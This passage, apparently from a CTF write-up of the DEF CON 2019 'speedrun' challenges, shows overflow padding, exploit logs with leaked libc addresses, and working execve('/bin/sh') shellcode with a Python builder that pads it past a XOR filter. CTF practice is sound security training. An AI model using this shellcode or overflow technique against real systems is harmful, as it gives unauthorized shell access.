AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x86\x06@
$ ls -
banner_fail bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin service.conf speedrun-001 srv sys tmp usr var wrapper
$ cat /flag
OOO{Ask any pwner. Any real pwner. It don't matter if you pwn by an inch or a m1L3. pwning's pwning.}
[*] Got EOF while reading in interactive
speedrun-002
$ ./speedrun-002
We meet again on these pwning streets.
What say you now?
hoge
What a ho-hum thing to say.
Fare thee well.
This one also has a buffer overflow. I first tried to call system via ret2libc from the ROP chain, but it worked locally and failed remotely; it seems the remote side restricted the use of the system function, so, as in 001, I switched to invoking the system call directly and got a shell.
$ python exploit.py
[+] Opening connection to speedrun-002.quals2019.oooverflow.io on port 31337: Done
[*] '/home/yyy/ctf/all/DEF_CON_2019/speedrun-002/speedrun-002'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/home/yyy/ctf/all/DEF_CON_2019/speedrun-002/libc/lib/x86_64-linux-gnu/libc-2.27.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
We meet again on these pwning streets.
What say you now?
What an interesting thing to say. Tell me more.
Fascinating.
leak_addr: 0x7f4b03669140
libc_base: 0x7f4b03559000
system_addr: 0x7f4b035a8440
We meet again on these pwning streets.
What say you now?
What an interesting thing to say. Tell me more.
Fascinating.
[*] Switching to interactive mode
$ cat /flag
OOO{I_didn't know p1zzA places__mAde pwners.}
$ exit
[*] Got EOF while reading in interactive
speedrun-003
$ ./speedrun-003
Think you can drift?
Send me your drift
hoge
You're not ready.
A shellcode challenge. You have to send 30 bytes of shellcode, and the XOR of all the bytes in the first half must equal the XOR of all the bytes in the second half.
48 bb 2f 62 69 6e 2f 73 68 00    movabs rbx,0x68732f6e69622f
31 f6                            xor    esi,esi
56                               push   rsi
53                               push   rbx
54                               push   rsp
5f                               pop    rdi
b0 3b                            mov    al,0x3b
31 d2                            xor    edx,edx
0f 05                            syscall
I used shellcode like the above, but it is 22 bytes, so I adjusted it to fit. Specifically, I made the first half end at push rsp, and padded the remainder by repeating xor edx, edx four times; to make the two XOR values match I duplicated mov al, 0x3b and varied the 0x3b in the first copy, ending up with mov al, 0x5a.
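An added Python example (not the author's exploit.py) that models the 15/15 XOR check described above and computes the free mov al immediate that balances the two halves; the byte layout is my own reading of the description, so the immediate it produces need not match the one the author finally settled on.

```python
# Added example: model of the speedrun-003 filter as described in the writeup
# (30 bytes; XOR of bytes 0..14 must equal XOR of bytes 15..29) and the
# calculation of the spare "mov al, X" immediate. Layout is my own reading of
# the description; the original exploit script is not on the page.

HALF = 15  # the check splits the 30-byte input into two 15-byte halves

# Pieces of the 22-byte execve("/bin/sh") shellcode from the disassembly above.
MOVABS_RBX = bytes.fromhex("48bb2f62696e2f736800")  # movabs rbx, "/bin/sh\0"
XOR_ESI    = bytes.fromhex("31f6")                  # xor esi, esi
PUSH_RSI   = bytes.fromhex("56")                    # push rsi
PUSH_RBX   = bytes.fromhex("53")                    # push rbx
PUSH_RSP   = bytes.fromhex("54")                    # push rsp
POP_RDI    = bytes.fromhex("5f")                    # pop rdi
XOR_EDX    = bytes.fromhex("31d2")                  # xor edx, edx
SYSCALL    = bytes.fromhex("0f05")                  # syscall

# Index of the free immediate: 15 bytes of first half, then 5f, b0, <imm>.
FREE_INDEX = HALF + 2

def half_xors(code):
    """Return (xor of first half, xor of second half) as the filter computes them."""
    if len(code) != 2 * HALF:
        raise ValueError("filter expects exactly 30 bytes")
    first = second = 0
    for b in code[:HALF]:
        first ^= b
    for b in code[HALF:]:
        second ^= b
    return first, second

def passes_filter(code):
    first, second = half_xors(code)
    return first == second

def build(free_imm):
    """Layout from the writeup: first half ends at push rsp; the second half
    carries a spare 'mov al, <free_imm>' (overridden by mov al, 0x3b before
    the syscall) plus four xor edx,edx as padding. Both halves are 15 bytes."""
    first = MOVABS_RBX + XOR_ESI + PUSH_RSI + PUSH_RBX + PUSH_RSP
    second = (POP_RDI + bytes([0xB0, free_imm]) + bytes([0xB0, 0x3B])
              + XOR_EDX * 4 + SYSCALL)
    return first + second

def balancing_imm():
    """Equal halves <=> XOR of all 30 bytes is 0, so the free immediate must
    equal the XOR of every other byte in the skeleton."""
    skeleton = build(0)
    acc = 0
    for i, b in enumerate(skeleton):
        if i != FREE_INDEX:
            acc ^= b
    return acc
```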
$ python exploit.py
[+] Opening connection to speedrun-003.quals2019.oooverflow.io on port 31337: Done
[*] Switching to interactive mode
Think you can drift?
Send me your drift
$ cat /flag
OOO{Fifty percent of something is better than a hundred percent of nothing. (except when it comes to pwning)}
$ exit
[*] Got EOF while reading in interactive